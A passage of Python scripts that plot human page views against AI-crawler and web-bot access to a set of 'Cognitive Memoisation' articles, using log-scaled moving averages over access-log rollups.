        rel = int(((bdt - pub_bucket_dt).total_seconds()) // BUCKET_SECONDS)
        if rel < min_rel or rel > max_rel:
            continue
        k = rel - min_rel
        arr_h[k] = H.get((bdt, t), 0)
        arr_m[k] = M.get((bdt, t), 0)
    H_series[t] = arr_h
    M_series[t] = arr_m

# Centered MA    
def ma_center_zero(x: np.ndarray, win: int) -> np.ndarray:
    """Centered moving average with zero padding.
    win is in buckets; coerced to odd >= 1 elsewhere.
    """
    if win <= 1:
        return x.astype(float, copy=True)

    if win % 2 == 0:
        win += 1
    k = win // 2

    xp = np.pad(x.astype(float, copy=False), (k, k), mode="constant", constant_values=0.0)
    kernel = np.ones(win, dtype=float) / float(win)
    return np.convolve(xp, kernel, mode="valid")

H_ma = {t: ma_center_zero(H_series[t],MA_BUCKETS) for t in eligible_titles}
M_ma = {t: ma_center_zero(M_series[t],MA_BUCKETS) for t in eligible_titles}

# LOG compression after MA(3); apply REQUIRED amplification to human prior to log
H_log = {t: np.log1p(H_AMP * H_ma[t]) for t in eligible_titles}
M_log = {t: np.log1p(M_ma[t]) for t in eligible_titles}

# Global scaling
global_max = 0.0
for t in eligible_titles:
    mx = float(np.nanmax(np.maximum(H_log[t], M_log[t])))
    global_max = max(global_max, mx)
scale = (ROW_MAX / global_max) if global_max > 0 else 0.0

# Order by publication datetime
ordered = sorted(eligible_titles, key=lambda t: (pub_dt[t], t))
N = len(ordered)

if ROW_MAX > (ROW_SPACING / 2.0) - ROW_MARGIN:
    raise RuntimeError("Non-overlap constraint violated with current ROW_SPACING/ROW_MAX.")

ypos = {t: float((N - 1) - i) * ROW_SPACING for i, t in enumerate(ordered)}

def row_label(t: str) -> str:
    h_total = int(np.sum(H_series[t]))
    m_total = int(np.sum(M_series[t]))
    return f"{t} ({compact_zulu(pub_dt[t])}) (h:{h_total}, m:{m_total})"

# Plot (explicit colours)
fig, ax = plt.subplots(figsize=(16, max(10, N * 0.45)), dpi=180)
# x = rel_range.astype(float)
x_days = (rel_range.astype(float) * BUCKET_SECONDS) / 86400.0

for t in ordered:
    y0 = ypos[t]
    ax.plot(x_days, np.full_like(x_days, y0), lw=0.25, color=BASELINE_COLOR)
    ax.fill_between(x_days, y0, y0 + (H_log[t] * scale), alpha=1.0, color=H_COLOR)
    ax.fill_between(x_days, y0, y0 - (M_log[t] * scale), alpha=1.0, color=M_COLOR)

ax.axvline(0, ls="--", lw=0.8, color=BASELINE_COLOR)

# Daily ticks, because x is now in days
min_day = -LEAD_DAYS
max_day = float((max_rel * BUCKET_SECONDS) / 86400.0)

ax.set_xlim(min_day, max_day)

span = max_day - min_day
if span <= 120:
    minor_step = 7
    major_step = 14
elif span <= 240:
    minor_step = 15
    major_step = 30 
elif span <= 480:
    minor_step = 15
    major_step = 60
else:
    major_step = 10
    minor_step = 5

def ticks_anchored_at_zero(min_day: float, max_day: float, step: float) -> np.ndarray:
    """
    Generate ticks that are exact multiples of `step`
    and anchored at 0, clipped to [min_day, max_day].
    """
    lo = int(math.floor(min_day / step))
    hi = int(math.ceil(max_day / step))
    return (np.arange(lo, hi + 1, dtype=int) * step).astype(float)

major = ticks_anchored_at_zero(min_day, max_day, major_step)
minor = ticks_anchored_at_zero(min_day, max_day, minor_step)

ax.set_xticks(major)
ax.set_xticks(minor,minor=True)

ax.grid(True, which="major", axis="x")
ax.grid(False, which="minor", axis="x")

ax.tick_params(axis="x", which="minor", labelbottom=False)  # never label minors

yticks = [ypos[t] for t in ordered]
ax.set_yticks(yticks)
ax.set_yticklabels([row_label(t) for t in ordered], fontsize=7)

ax.set_xlabel("Days relative to publication (UTC/Z)")
ax.set_title(
    f"Human vs Anon/Metadata Access Lifecycle Graphlets (LOG ln(1+x) + MA({MA_DAYS:g}; MA_BUCKET={MA_BUCKETS} ); "
    f"\nGLOBAL_MAX_LOG={global_max:.6f};\n H_AMP={H_AMP}"
)

ax.legend(
    handles=[
        Patch(facecolor=H_COLOR, edgecolor=H_COLOR, label="human (page-only human_get_ok; MA ln(1+H_AMP·x); up)"),
        Patch(facecolor=M_COLOR, edgecolor=M_COLOR, label=f"meta (Σ metadata *_get_ok anon/metadata; MA; ln(1+x); down)"),
    ],
    loc="upper left",
    framealpha=0.85,
)

# Margin sizing based on y-label extents
fig.canvas.draw()
renderer = fig.canvas.get_renderer()
max_w_px = max(lab.get_window_extent(renderer=renderer).width for lab in ax.get_yticklabels())
fig_w_px = fig.get_size_inches()[0] * fig.dpi
left_frac = min(0.88, max(0.05, (max_w_px + 15) / fig_w_px))
plt.subplots_adjust(left=left_frac, right=0.985, top=0.95, bottom=0.06)
plt.savefig(out_png)
plt.savefig(out_svg)
plt.close()
(out_png, out_svg)

(new) humanai.py

Human get_200_304 versus attributed AI bots.

#!/usr/bin/env python3

# History
#  2026-03-09 OpenAI - derived from access; plots human blue vs machine green
#                     using the same rollups / manifest workflow.

import os, re, math, csv
from datetime import datetime, timezone, timedelta
from urllib.parse import unquote
import argparse

import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.patches import Patch

# Paths (already extracted)
manifest_path = "corpus/manifest.tsv"
rollups_dir = "rollups"

out_png = "machine.png"
out_svg = "svg-machine.svg"
out_tsv = "tsv-machine.tsv"

ap = argparse.ArgumentParser()
ap.add_argument(
    "--ma-days",
    type=float,
    default=7.0,
    help="Moving average window in days (default=7.0)",
)
ap.add_argument(
    "--h-amp",
    type=float,
    default=40.0,
    help="Human amplification factor (default=40.0)",
)
args = ap.parse_args()

MA_DAYS = float(args.ma_days)
H_AMP = float(args.h_amp)

# ---------------------------------------------------------------------
# CURATOR RENAME MAP (FULL)
# ---------------------------------------------------------------------
RENAME_MAP = {
    "Cognitive Memoisation (CM-2): A Human-Governed Protocol for Knowledge Governance and Transport in AI Systems)":
        "First Self-Hosting Epistemic Capture Using Cognitive Memoisation (CM-2)",
    "Cognitive Memoisation (CM-2) for Governing Knowledge in Human-AI Collaboration":
        "Cognitive Memoisation (CM-2) Protocol",
    "Let's Build a Ship - Cognitive Memoisation for Governing Knowledge in Human - AI Collabortion":
        "Cognitive Memoisation (CM-2) Protocol",
    "Cognitive Memoisation: corpus guide":
        "Cognitive Memoisation Corpus Map",
    "Cognitive Memoisation and LLMs: A Method for Exploratory Modelling Before Formalisation'":
        "Context is Not Just a Window: Cognitive Memoisation as a Context Architecture for Human-AI Collaboration",
    "What Can Humans Trust LLM AI to Do":
        "What Can Humans Trust LLM AI to Do?",
    "Recent Breaking Change in ChatGPT: The Loss of Semantic Artefact Injection for Knowledge Engineering":
        "Recent Breaking Change in ChatGPT: The Loss of Semantic Artefact Injection for Knowledge Engineering (2026-12-30)",
}

LEAD_DAYS = 10
ROW_SPACING = 1.0
ROW_MAX = 0.45
ROW_MARGIN = 0.05

# Explicit publication colours
H_COLOR = "#1f77b4"   # blue
G_COLOR = "#2ca02c"   # green
BASELINE_COLOR = "#000000"


def parse_zulu(s: str) -> datetime:
    s = str(s).strip()
    if s.endswith("Z"):
        s2 = s[:-1]
        fmt = "%Y-%m-%dT%H:%M"
        if re.match(r".*:\d\d:\d\d$", s2):
            fmt = "%Y-%m-%dT%H:%M:%S"
        return datetime.strptime(s2, fmt).replace(tzinfo=timezone.utc)
    dt = datetime.fromisoformat(s)
    if dt.tzinfo is None:
        dt = dt.replace(tzinfo=timezone.utc)
    return dt.astimezone(timezone.utc)


def compact_zulu(dt: datetime) -> str:
    return dt.astimezone(timezone.utc).strftime("%Y-%m-%dT%H:%MZ")


def norm_title(s: str) -> str:
    s = str(s).replace("_", " ")
    s = re.sub(r"\s+", " ", s).strip()
    s = s.replace("–", "-").replace("—", "-").replace("−", "-")
    return RENAME_MAP.get(s, s)


def bucket_window_from_filename(fn: str) -> tuple[datetime, datetime, int]:
    m = re.match(
        r"^(\d{4})_(\d{2})_(\d{2})T(\d{2})_(\d{2})Z-to-"
        r"(\d{4})_(\d{2})_(\d{2})T(\d{2})_(\d{2})Z\.tsv$",
        fn,
    )
    if not m:
        raise ValueError(f"Unparseable rollup filename: {fn}")
    y1, mo1, d1, hh1, mm1, y2, mo2, d2, hh2, mm2 = map(int, m.groups())
    bstart = datetime(y1, mo1, d1, hh1, mm1, tzinfo=timezone.utc)
    bend = datetime(y2, mo2, d2, hh2, mm2, tzinfo=timezone.utc)
    secs = int((bend - bstart).total_seconds())
    if secs <= 0:
        raise ValueError(f"Non-positive bucket window in filename: {fn}")
    return bstart, bend, secs


def classify_path_to_title(path: str):
    p = str(path).split("?", 1)[0]
    p = unquote(p)

    if "-meta/" in p:
        kind = "meta"
        if "/pub-meta/" in p:
            rest = p.split("/pub-meta/", 1)[1]
            parts = rest.split("/", 2)
            if len(parts) >= 2:
                title = parts[1]
            else:
                return (None, None)
        else:
            rest = p.split("-meta/", 1)[1]
            parts = rest.split("/", 1)
            title = parts[1] if len(parts) == 2 else parts[0]
        return (kind, norm_title(title))

    if p.startswith("/pub/"):
        title = p[len("/pub/"):]
        return ("page", norm_title(title))

    return (None, None)


# ---- Load manifest ----
man = pd.read_csv(manifest_path, sep="\t", header=None, names=["title", "safe_file", "pub_date"])
norm_map = {}
pub_dt = {}
for _, r in man.iterrows():
    t = str(r["title"])
    nt = norm_title(t)
    norm_map.setdefault(nt, t)
    try:
        pub_dt[t] = parse_zulu(r["pub_date"])
    except Exception:
        pass

eligible_titles = [t for t in man["title"].tolist() if t in pub_dt]

# ---- Scan rollups and aggregate bucket counts ----
rollup_files = sorted([f for f in os.listdir(rollups_dir) if f.endswith(".tsv")])
if not rollup_files:
    raise RuntimeError("No rollup TSV files found")

first_file = os.path.join(rollups_dir, rollup_files[0])
with open(first_file, "r", newline="") as f:
    reader = csv.reader(f, delimiter="\t")
    header = next(reader)
col_index = {c: i for i, c in enumerate(header)}

path_idx = col_index["path"]
human_get_ok_idx = col_index["human_get_ok"]

# AI only = ai_* rollup bucket family.
machine_cols = [c for c in header if c.lower().startswith("ai_")]

if not machine_cols:
    raise RuntimeError("No ai_* columns found in rollup header")

machine_idx = [col_index[c] for c in machine_cols]

if not machine_cols:
    raise RuntimeError("No machine columns found in rollup header")

machine_idx = [col_index[c] for c in machine_cols]

H = {}
G = {}

BUCKET_SECONDS = None
min_bucket = None
max_bucket = None

for fn in rollup_files:
    bstart, bend, bsecs = bucket_window_from_filename(fn)
    if BUCKET_SECONDS is None:
        BUCKET_SECONDS = bsecs
    elif BUCKET_SECONDS != bsecs:
        raise ValueError(f"Inconsistent bucket sizes: saw {BUCKET_SECONDS}s then {bsecs}s in {fn}")

    min_bucket = bstart if min_bucket is None else min(min_bucket, bstart)
    max_bucket = bstart if max_bucket is None else max(max_bucket, bstart)

    fp = os.path.join(rollups_dir, fn)
    with open(fp, "r", newline="") as f:
        reader = csv.reader(f, delimiter="\t")
        _ = next(reader)
        for row in reader:
            if not row or len(row) <= path_idx:
                continue

            kind, nt = classify_path_to_title(row[path_idx])
            if kind is None or nt is None:
                continue
            if nt not in norm_map:
                continue
            title = norm_map[nt]
            if title not in pub_dt:
                continue

            # Blue: page-only human_get_ok, matching the existing lifecycle semantics.
            if kind == "page":
                try:
                    v = int(row[human_get_ok_idx])
                except Exception:
                    v = 0
                if v:
                    H[(bstart, title)] = H.get((bstart, title), 0) + v

            # Green: all non-human actor buckets on both page and meta carriers.
            s = 0
            for idx in machine_idx:
                try:
                    s += int(row[idx])
                except Exception:
                    pass
            if s:
                G[(bstart, title)] = G.get((bstart, title), 0) + s

MA_BUCKETS = int(round((MA_DAYS * 86400.0) / float(BUCKET_SECONDS)))
if MA_BUCKETS < 1:
    MA_BUCKETS = 1
if MA_BUCKETS % 2 == 0:
    MA_BUCKETS += 1

bucket_list = []
dt = min_bucket
while dt <= max_bucket:
    bucket_list.append(dt)
    dt += timedelta(seconds=BUCKET_SECONDS)

LEAD_BUCKETS = int((LEAD_DAYS * 86400) // BUCKET_SECONDS)
min_rel = -LEAD_BUCKETS
max_rel = max([
    int(((max_bucket - datetime.fromtimestamp((int(pub_dt[t].timestamp()) // BUCKET_SECONDS) * BUCKET_SECONDS, tz=timezone.utc)).total_seconds()) // BUCKET_SECONDS)
    for t in eligible_titles
])
rel_range = np.arange(min_rel, max_rel + 1, dtype=int)
x_days = rel_range.astype(float) * BUCKET_SECONDS / 86400.0

H_series = {}
G_series = {}
for t in eligible_titles:
    pdt = pub_dt[t]
    arr_h = np.zeros(len(rel_range), dtype=float)
    arr_g = np.zeros(len(rel_range), dtype=float)
    pub_epoch = int(pdt.timestamp())
    pub_bucket_epoch = (pub_epoch // BUCKET_SECONDS) * BUCKET_SECONDS
    pub_bucket_dt = datetime.fromtimestamp(pub_bucket_epoch, tz=timezone.utc)

    for bdt in bucket_list:
        rel = int(((bdt - pub_bucket_dt).total_seconds()) // BUCKET_SECONDS)
        if rel < min_rel or rel > max_rel:
            continue
        k = rel - min_rel
        arr_h[k] = H.get((bdt, t), 0)
        arr_g[k] = G.get((bdt, t), 0)
    H_series[t] = arr_h
    G_series[t] = arr_g


def ma_center_zero(x: np.ndarray, win: int) -> np.ndarray:
    if win <= 1:
        return x.astype(float, copy=True)
    if win % 2 == 0:
        win += 1
    k = win // 2
    xp = np.pad(x.astype(float, copy=False), (k, k), mode="constant", constant_values=0.0)
    kernel = np.ones(win, dtype=float) / float(win)
    return np.convolve(xp, kernel, mode="valid")


H_ma = {t: ma_center_zero(H_series[t], MA_BUCKETS) for t in eligible_titles}
G_ma = {t: ma_center_zero(G_series[t], MA_BUCKETS) for t in eligible_titles}

H_log = {t: np.log1p(H_AMP * H_ma[t]) for t in eligible_titles}
G_log = {t: np.log1p(G_ma[t]) for t in eligible_titles}

global_max = 0.0
for t in eligible_titles:
    mx = float(np.nanmax(np.maximum(H_log[t], G_log[t])))
    global_max = max(global_max, mx)
scale = (ROW_MAX / global_max) if global_max > 0 else 0.0

ordered = sorted(eligible_titles, key=lambda t: (pub_dt[t], t))
N = len(ordered)
if ROW_MAX > (ROW_SPACING / 2.0) - ROW_MARGIN:
    raise RuntimeError("Non-overlap constraint violated with current ROW_SPACING/ROW_MAX.")

ypos = {t: float((N - 1) - i) * ROW_SPACING for i, t in enumerate(ordered)}


def row_label(t: str) -> str:
    h_total = int(np.sum(H_series[t]))
    g_total = int(np.sum(G_series[t]))
    return f"{t} ({compact_zulu(pub_dt[t])}) (h:{h_total}, a:{g_total})"


# Optional TSV export for audit / comparison.
with open(out_tsv, "w", newline="") as f:
    w = csv.writer(f, delimiter="\t")
    w.writerow(["title", "publication_z", "human_total", "machine_total"])
    for t in ordered:
        w.writerow([t, compact_zulu(pub_dt[t]), int(np.sum(H_series[t])), int(np.sum(G_series[t]))])


fig, ax = plt.subplots(figsize=(16, max(10, N * 0.45)), dpi=180)

for t in ordered:
    y0 = ypos[t]
    ax.plot(x_days, np.full_like(x_days, y0), lw=0.25, color=BASELINE_COLOR)
    ax.fill_between(x_days, y0, y0 + (H_log[t] * scale), alpha=1.0, color=H_COLOR)
    ax.fill_between(x_days, y0, y0 - (G_log[t] * scale), alpha=1.0, color=G_COLOR)

ax.axvline(0, ls="--", lw=0.8, color=BASELINE_COLOR)

min_day = -LEAD_DAYS
max_day = float((max_rel * BUCKET_SECONDS) / 86400.0)
ax.set_xlim(min_day, max_day)

span = max_day - min_day
if span <= 120:
    minor_step = 7
    major_step = 14
elif span <= 240:
    minor_step = 15
    major_step = 30
elif span <= 480:
    minor_step = 15
    major_step = 60
else:
    major_step = 10
    minor_step = 5


def ticks_anchored_at_zero(min_day: float, max_day: float, step: float) -> np.ndarray:
    lo = int(math.floor(min_day / step))
    hi = int(math.ceil(max_day / step))
    return (np.arange(lo, hi + 1, dtype=int) * step).astype(float)


major = ticks_anchored_at_zero(min_day, max_day, major_step)
minor = ticks_anchored_at_zero(min_day, max_day, minor_step)
ax.set_xticks(major)
ax.set_xticks(minor, minor=True)
ax.grid(True, which="major", axis="x")
ax.grid(False, which="minor", axis="x")
ax.tick_params(axis="x", which="minor", labelbottom=False)

yticks = [ypos[t] for t in ordered]
ax.set_yticks(yticks)
ax.set_yticklabels([row_label(t) for t in ordered], fontsize=7)

ax.set_xlabel("Days relative to publication (UTC/Z)")
ax.set_title(
    f"Human vs Ai Lifecycle Graphlets (LOG ln(1+x) + MA({MA_DAYS:g}d centered; MA_BUCKET={MA_BUCKETS});\n"
    f"GLOBAL_MAX_LOG={global_max:.6f}; H_AMP={H_AMP}"
)
ax.legend(
    handles=[
        Patch(facecolor=H_COLOR, edgecolor=H_COLOR, label="human (page-only human_get_ok; MA ln(1+H_AMP·x); up)"),
        Patch(facecolor=G_COLOR, edgecolor=G_COLOR, label="machine (Σ ai_* buckets; MA; ln(1+x); down)"),
    ],
    loc="upper left",
    framealpha=0.85,
)

fig.canvas.draw()
renderer = fig.canvas.get_renderer()
max_w_px = max(lab.get_window_extent(renderer=renderer).width for lab in ax.get_yticklabels())
fig_w_px = fig.get_size_inches()[0] * fig.dpi
left_frac = min(0.88, max(0.05, (max_w_px + 15) / fig_w_px))
plt.subplots_adjust(left=left_frac, right=0.985, top=0.95, bottom=0.06)
plt.savefig(out_png)
plt.savefig(out_svg)
plt.close()

print(out_png, out_svg, out_tsv)

humanbot.py (new)

Human get_200_304 vs web bots (indexes et al.)

#!/usr/bin/env python3

# History
#  2026-03-09 OpenAI - derived from access; plots human blue vs machine green
#                     using the same rollups / manifest workflow.

import os, re, math, csv
from datetime import datetime, timezone, timedelta
from urllib.parse import unquote
import argparse

import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.patches import Patch

# Paths (already extracted)
manifest_path = "corpus/manifest.tsv"
rollups_dir = "rollups"

out_png = "wbot.png"
out_svg = "svg-wbot.svg"
out_tsv = "tsv-wbot.tsv"

ap = argparse.ArgumentParser()
ap.add_argument(
    "--ma-days",
    type=float,
    default=7.0,
    help="Moving average window in days (default=7.0)",
)
ap.add_argument(
    "--h-amp",
    type=float,
    default=40.0,
    help="Human amplification factor (default=40.0)",
)
args = ap.parse_args()

MA_DAYS = float(args.ma_days)
H_AMP = float(args.h_amp)

# ---------------------------------------------------------------------
# CURATOR RENAME MAP (FULL)
# ---------------------------------------------------------------------
RENAME_MAP = {
    "Cognitive Memoisation (CM-2): A Human-Governed Protocol for Knowledge Governance and Transport in AI Systems)":
        "First Self-Hosting Epistemic Capture Using Cognitive Memoisation (CM-2)",
    "Cognitive Memoisation (CM-2) for Governing Knowledge in Human-AI Collaboration":
        "Cognitive Memoisation (CM-2) Protocol",
    "Let's Build a Ship - Cognitive Memoisation for Governing Knowledge in Human - AI Collabortion":
        "Cognitive Memoisation (CM-2) Protocol",
    "Cognitive Memoisation: corpus guide":
        "Cognitive Memoisation Corpus Map",
    "Cognitive Memoisation and LLMs: A Method for Exploratory Modelling Before Formalisation'":
        "Context is Not Just a Window: Cognitive Memoisation as a Context Architecture for Human-AI Collaboration",
    "What Can Humans Trust LLM AI to Do":
        "What Can Humans Trust LLM AI to Do?",
    "Recent Breaking Change in ChatGPT: The Loss of Semantic Artefact Injection for Knowledge Engineering":
        "Recent Breaking Change in ChatGPT: The Loss of Semantic Artefact Injection for Knowledge Engineering (2026-12-30)",
}

LEAD_DAYS = 10
ROW_SPACING = 1.0
ROW_MAX = 0.45
ROW_MARGIN = 0.05

# Explicit publication colours
H_COLOR = "#1f77b4"   # blue
G_COLOR = "#e377c2"   # pink
BASELINE_COLOR = "#000000"


def parse_zulu(s: str) -> datetime:
    s = str(s).strip()
    if s.endswith("Z"):
        s2 = s[:-1]
        fmt = "%Y-%m-%dT%H:%M"
        if re.match(r".*:\d\d:\d\d$", s2):
            fmt = "%Y-%m-%dT%H:%M:%S"
        return datetime.strptime(s2, fmt).replace(tzinfo=timezone.utc)
    dt = datetime.fromisoformat(s)
    if dt.tzinfo is None:
        dt = dt.replace(tzinfo=timezone.utc)
    return dt.astimezone(timezone.utc)


def compact_zulu(dt: datetime) -> str:
    return dt.astimezone(timezone.utc).strftime("%Y-%m-%dT%H:%MZ")


def norm_title(s: str) -> str:
    s = str(s).replace("_", " ")
    s = re.sub(r"\s+", " ", s).strip()
    s = s.replace("–", "-").replace("—", "-").replace("−", "-")
    return RENAME_MAP.get(s, s)


def bucket_window_from_filename(fn: str) -> tuple[datetime, datetime, int]:
    m = re.match(
        r"^(\d{4})_(\d{2})_(\d{2})T(\d{2})_(\d{2})Z-to-"
        r"(\d{4})_(\d{2})_(\d{2})T(\d{2})_(\d{2})Z\.tsv$",
        fn,
    )
    if not m:
        raise ValueError(f"Unparseable rollup filename: {fn}")
    y1, mo1, d1, hh1, mm1, y2, mo2, d2, hh2, mm2 = map(int, m.groups())
    bstart = datetime(y1, mo1, d1, hh1, mm1, tzinfo=timezone.utc)
    bend = datetime(y2, mo2, d2, hh2, mm2, tzinfo=timezone.utc)
    secs = int((bend - bstart).total_seconds())
    if secs <= 0:
        raise ValueError(f"Non-positive bucket window in filename: {fn}")
    return bstart, bend, secs


def classify_path_to_title(path: str):
    p = str(path).split("?", 1)[0]
    p = unquote(p)

    if "-meta/" in p:
        kind = "meta"
        if "/pub-meta/" in p:
            rest = p.split("/pub-meta/", 1)[1]
            parts = rest.split("/", 2)
            if len(parts) >= 2:
                title = parts[1]
            else:
                return (None, None)
        else:
            rest = p.split("-meta/", 1)[1]
            parts = rest.split("/", 1)
            title = parts[1] if len(parts) == 2 else parts[0]
        return (kind, norm_title(title))

    if p.startswith("/pub/"):
        title = p[len("/pub/"):]
        return ("page", norm_title(title))

    return (None, None)


# ---- Load manifest ----
man = pd.read_csv(manifest_path, sep="\t", header=None, names=["title", "safe_file", "pub_date"])
norm_map = {}
pub_dt = {}
for _, r in man.iterrows():
    t = str(r["title"])
    nt = norm_title(t)
    norm_map.setdefault(nt, t)
    try:
        pub_dt[t] = parse_zulu(r["pub_date"])
    except Exception:
        pass

eligible_titles = [t for t in man["title"].tolist() if t in pub_dt]

# ---- Scan rollups and aggregate bucket counts ----
rollup_files = sorted([f for f in os.listdir(rollups_dir) if f.endswith(".tsv")])
if not rollup_files:
    raise RuntimeError("No rollup TSV files found")

first_file = os.path.join(rollups_dir, rollup_files[0])
with open(first_file, "r", newline="") as f:
    reader = csv.reader(f, delimiter="\t")
    header = next(reader)
col_index = {c: i for i, c in enumerate(header)}

path_idx = col_index["path"]
human_get_ok_idx = col_index["human_get_ok"]

# bot only = ai_* rollup bucket family.
bot_cols = [c for c in header if c.lower().startswith("bot_")]

if not bot_cols:
    raise RuntimeError("No bot_* columns found in rollup header")

bot_idx = [col_index[c] for c in bot_cols]

H = {}
G = {}

BUCKET_SECONDS = None
min_bucket = None
max_bucket = None

for fn in rollup_files:
    bstart, bend, bsecs = bucket_window_from_filename(fn)
    if BUCKET_SECONDS is None:
        BUCKET_SECONDS = bsecs
    elif BUCKET_SECONDS != bsecs:
        raise ValueError(f"Inconsistent bucket sizes: saw {BUCKET_SECONDS}s then {bsecs}s in {fn}")

    min_bucket = bstart if min_bucket is None else min(min_bucket, bstart)
    max_bucket = bstart if max_bucket is None else max(max_bucket, bstart)

    fp = os.path.join(rollups_dir, fn)
    with open(fp, "r", newline="") as f:
        reader = csv.reader(f, delimiter="\t")
        _ = next(reader)
        for row in reader:
            if not row or len(row) <= path_idx:
                continue

            kind, nt = classify_path_to_title(row[path_idx])
            if kind is None or nt is None:
                continue
            if nt not in norm_map:
                continue
            title = norm_map[nt]
            if title not in pub_dt:
                continue

            # Blue: page-only human_get_ok, matching the existing lifecycle semantics.
            if kind == "page":
                try:
                    v = int(row[human_get_ok_idx])
                except Exception:
                    v = 0
                if v:
                    H[(bstart, title)] = H.get((bstart, title), 0) + v

            # bot: all bot actor buckets on both page and meta carriers.
            s = 0
            for idx in bot_idx:
                try:
                    s += int(row[idx])
                except Exception:
                    pass
            if s:
                G[(bstart, title)] = G.get((bstart, title), 0) + s

MA_BUCKETS = int(round((MA_DAYS * 86400.0) / float(BUCKET_SECONDS)))
if MA_BUCKETS < 1:
    MA_BUCKETS = 1
if MA_BUCKETS % 2 == 0:
    MA_BUCKETS += 1

bucket_list = []
dt = min_bucket
while dt <= max_bucket:
    bucket_list.append(dt)
    dt += timedelta(seconds=BUCKET_SECONDS)

LEAD_BUCKETS = int((LEAD_DAYS * 86400) // BUCKET_SECONDS)
min_rel = -LEAD_BUCKETS
max_rel = max([
    int(((max_bucket - datetime.fromtimestamp((int(pub_dt[t].timestamp()) // BUCKET_SECONDS) * BUCKET_SECONDS, tz=timezone.utc)).total_seconds()) // BUCKET_SECONDS)
    for t in eligible_titles
])
rel_range = np.arange(min_rel, max_rel + 1, dtype=int)
x_days = rel_range.astype(float) * BUCKET_SECONDS / 86400.0

H_series = {}
G_series = {}
for t in eligible_titles:
    pdt = pub_dt[t]
    arr_h = np.zeros(len(rel_range), dtype=float)
    arr_g = np.zeros(len(rel_range), dtype=float)
    pub_epoch = int(pdt.timestamp())
    pub_bucket_epoch = (pub_epoch // BUCKET_SECONDS) * BUCKET_SECONDS
    pub_bucket_dt = datetime.fromtimestamp(pub_bucket_epoch, tz=timezone.utc)

    for bdt in bucket_list:
        rel = int(((bdt - pub_bucket_dt).total_seconds()) // BUCKET_SECONDS)
        if rel < min_rel or rel > max_rel:
            continue
        k = rel - min_rel
        arr_h[k] = H.get((bdt, t), 0)
        arr_g[k] = G.get((bdt, t), 0)
    H_series[t] = arr_h
    G_series[t] = arr_g


def ma_center_zero(x: np.ndarray, win: int) -> np.ndarray:
    if win <= 1:
        return x.astype(float, copy=True)
    if win % 2 == 0:
        win += 1
    k = win // 2
    xp = np.pad(x.astype(float, copy=False), (k, k), mode="constant", constant_values=0.0)
    kernel = np.ones(win, dtype=float) / float(win)
    return np.convolve(xp, kernel, mode="valid")


H_ma = {t: ma_center_zero(H_series[t], MA_BUCKETS) for t in eligible_titles}
G_ma = {t: ma_center_zero(G_series[t], MA_BUCKETS) for t in eligible_titles}

H_log = {t: np.log1p(H_AMP * H_ma[t]) for t in eligible_titles}
G_log = {t: np.log1p(H_AMP * G_ma[t]) for t in eligible_titles}

global_max = 0.0
for t in eligible_titles:
    mx = float(np.nanmax(np.maximum(H_log[t], G_log[t])))
    global_max = max(global_max, mx)
scale = (ROW_MAX / global_max) if global_max > 0 else 0.0

ordered = sorted(eligible_titles, key=lambda t: (pub_dt[t], t))
N = len(ordered)
if ROW_MAX > (ROW_SPACING / 2.0) - ROW_MARGIN:
    raise RuntimeError("Non-overlap constraint violated with current ROW_SPACING/ROW_MAX.")

ypos = {t: float((N - 1) - i) * ROW_SPACING for i, t in enumerate(ordered)}


def row_label(t: str) -> str:
    h_total = int(np.sum(H_series[t]))
    g_total = int(np.sum(G_series[t]))
    return f"{t} ({compact_zulu(pub_dt[t])}) (h:{h_total}, a:{g_total})"


# Optional TSV export for audit / comparison.
with open(out_tsv, "w", newline="") as f:
    w = csv.writer(f, delimiter="\t")
    w.writerow(["title", "publication_z", "human_total", "machine_total"])
    for t in ordered:
        w.writerow([t, compact_zulu(pub_dt[t]), int(np.sum(H_series[t])), int(np.sum(G_series[t]))])


fig, ax = plt.subplots(figsize=(16, max(10, N * 0.45)), dpi=180)

for t in ordered:
    y0 = ypos[t]
    ax.plot(x_days, np.full_like(x_days, y0), lw=0.25, color=BASELINE_COLOR)
    ax.fill_between(x_days, y0, y0 + (H_log[t] * scale), alpha=1.0, color=H_COLOR)
    ax.fill_between(x_days, y0, y0 - (G_log[t] * scale), alpha=1.0, color=G_COLOR)

ax.axvline(0, ls="--", lw=0.8, color=BASELINE_COLOR)

min_day = -LEAD_DAYS
max_day = float((max_rel * BUCKET_SECONDS) / 86400.0)
ax.set_xlim(min_day, max_day)

span = max_day - min_day
if span <= 120:
    minor_step = 7
    major_step = 14
elif span <= 240:
    minor_step = 15
    major_step = 30
elif span <= 480:
    minor_step = 15
    major_step = 60
else:
    major_step = 10
    minor_step = 5


def ticks_anchored_at_zero(min_day: float, max_day: float, step: float) -> np.ndarray:
    lo = int(math.floor(min_day / step))
    hi = int(math.ceil(max_day / step))
    return (np.arange(lo, hi + 1, dtype=int) * step).astype(float)


major = ticks_anchored_at_zero(min_day, max_day, major_step)
minor = ticks_anchored_at_zero(min_day, max_day, minor_step)
ax.set_xticks(major)
ax.set_xticks(minor, minor=True)
ax.grid(True, which="major", axis="x")
ax.grid(False, which="minor", axis="x")
ax.tick_params(axis="x", which="minor", labelbottom=False)

yticks = [ypos[t] for t in ordered]
ax.set_yticks(yticks)
ax.set_yticklabels([row_label(t) for t in ordered], fontsize=7)

ax.set_xlabel("Days relative to publication (UTC/Z)")
ax.set_title(
    f"Human vs Bots Lifecycle Graphlets (LOG ln(1+x) + MA({MA_DAYS:g}d centered; MA_BUCKET={MA_BUCKETS});\n"
    f"GLOBAL_MAX_LOG={global_max:.6f}; H_AMP={H_AMP}"
)
ax.legend(
    handles=[
        Patch(facecolor=H_COLOR, edgecolor=H_COLOR, label="human (page-only human_get_ok; MA ln(1+H_AMP*x); up)"),
        Patch(facecolor=G_COLOR, edgecolor=G_COLOR, label="machine (Σ bot_* buckets; MA; ln(1+H_AMP*x); down)"),
    ],
    loc="upper left",
    framealpha=0.85,
)

fig.canvas.draw()
renderer = fig.canvas.get_renderer()
max_w_px = max(lab.get_window_extent(renderer=renderer).width for lab in ax.get_yticklabels())
fig_w_px = fig.get_size_inches()[0] * fig.dpi
left_frac = min(0.88, max(0.05, (max_w_px + 15) / fig_w_px))
plt.subplots_adjust(left=left_frac, right=0.985, top=0.95, bottom=0.06)
plt.savefig(out_png)
plt.savefig(out_svg)
plt.close()

print(out_png, out_svg, out_tsv)

humanallmachin.py

Human get_200_304 versus all machines.

#!/usr/bin/env python3

# History
#  2026-03-09 OpenAI - derived from access; plots human blue vs machine green
#                     using the same rollups / manifest workflow.

